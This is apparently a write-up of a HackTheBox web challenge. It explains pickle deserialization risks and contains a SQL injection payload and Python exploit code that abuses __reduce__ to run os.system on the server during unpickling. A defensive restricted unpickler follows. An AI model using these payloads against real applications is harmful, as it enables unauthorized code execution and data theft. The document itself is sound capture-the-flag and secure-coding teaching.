We covered the Python pickle library and explained why it’s not secure any more. Additionally, we demonstrated how to exploit a web application that uses the pickle library, in combination with SQL injection. This was part of the HackTheBox C.O.P web challenge.



The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!

Video Highlights

The vulnerable URL:


The parameter "1" can be replaced with a classic SQL payload such as `" OR "1"="1`

The challenge source code reveals that the web application uses Python pickling to serialize and de-serialize data.

The pickle module implements binary protocols for serializing and de-serializing a Python object structure. _"Pickling"_ is the process whereby a Python object hierarchy is converted into a byte stream, and _"unpickling"_ is the inverse operation, whereby a byte stream (from a binary file or bytes-like object) is converted back into an object hierarchy.

The Python documentation states that pickle is not secure to unpickle, because it is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**. Never unpickle data that could have come from an untrusted source, or that could have been tampered with, as Python puts it. Pickling and unpickling can be performed using `pickle.dumps` and `pickle.loads` respectively.

Exploitation of `pickle` can be performed using `__reduce__`, which lets an object tell pickle which callable to invoke, and with which arguments, when it is rebuilt. That is what enables code execution from the pickled data.

Ultimately, the purpose of exploiting `pickle` is to create or modify a pickle so that it executes system commands on the target.

We used the exploit code below to solve the challenge.

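```python
import sys
import base64
import pickle
import urllib.parse
import requests
import os

# Command that runs on the server when the pickle is loaded
payload = "cp flag.txt application/static/."

class Exp:
    # __reduce__ tells pickle to call os.system(payload) on unpickling
    def __reduce__(self):
        return os.system, (payload,)

if __name__ == "__main__":
    # Serialize the object and base64-encode the resulting pickle
    payload = base64.b64encode(pickle.dumps(Exp())).decode()
```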
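The defensive counterpart, as an added example that is not part of the original write-up or the challenge source: a restricted unpickler that overrides `find_class` so that any `__reduce__`-style global lookup is refused before the callable can run. The names `ALLOWED_GLOBALS`, `RestrictedUnpickler`, `safe_loads_b64` and `try_load`, and both sample blobs, are assumptions constructed for illustration; the second sample uses the harmless `os.getcwd` as a stand-in callable.

```python
import base64
import io
import os
import pickle

# Assumption: the store only needs plain data (dict, list, str, int), so no
# importable global is required. Add (module, name) pairs only when needed.
ALLOWED_GLOBALS = set()

class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup that is not explicitly allowlisted."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def safe_loads_b64(blob):
    raw = base64.b64decode(blob, validate=True)  # reject non-base64 input
    return RestrictedUnpickler(io.BytesIO(raw)).load()

def try_load(blob):
    """Return (True, value) or (False, reason); never calls pickle.loads."""
    try:
        return True, safe_loads_b64(blob)
    except (pickle.UnpicklingError, ValueError) as exc:
        return False, str(exc)

# Constructed sample 1: the kind of plain record a shop would store.
BENIGN = base64.b64encode(
    pickle.dumps({"name": "Pickle Shirt", "price": 23, "sizes": ["S", "M"]})
).decode()

class _StandIn:
    # Constructed sample 2: same __reduce__ shape as the page's Exp class,
    # but with the harmless os.getcwd as the callable.
    def __reduce__(self):
        return os.getcwd, ()

STAND_IN = base64.b64encode(pickle.dumps(_StandIn())).decode()

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("stand-in", STAND_IN)):
        print(label, try_load(blob))
```

An allowlist narrows what a pickle can import but does not make `pickle` a safe format for untrusted input; where the data is plain records like the first sample, a data-only format such as JSON removes the problem entirely.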

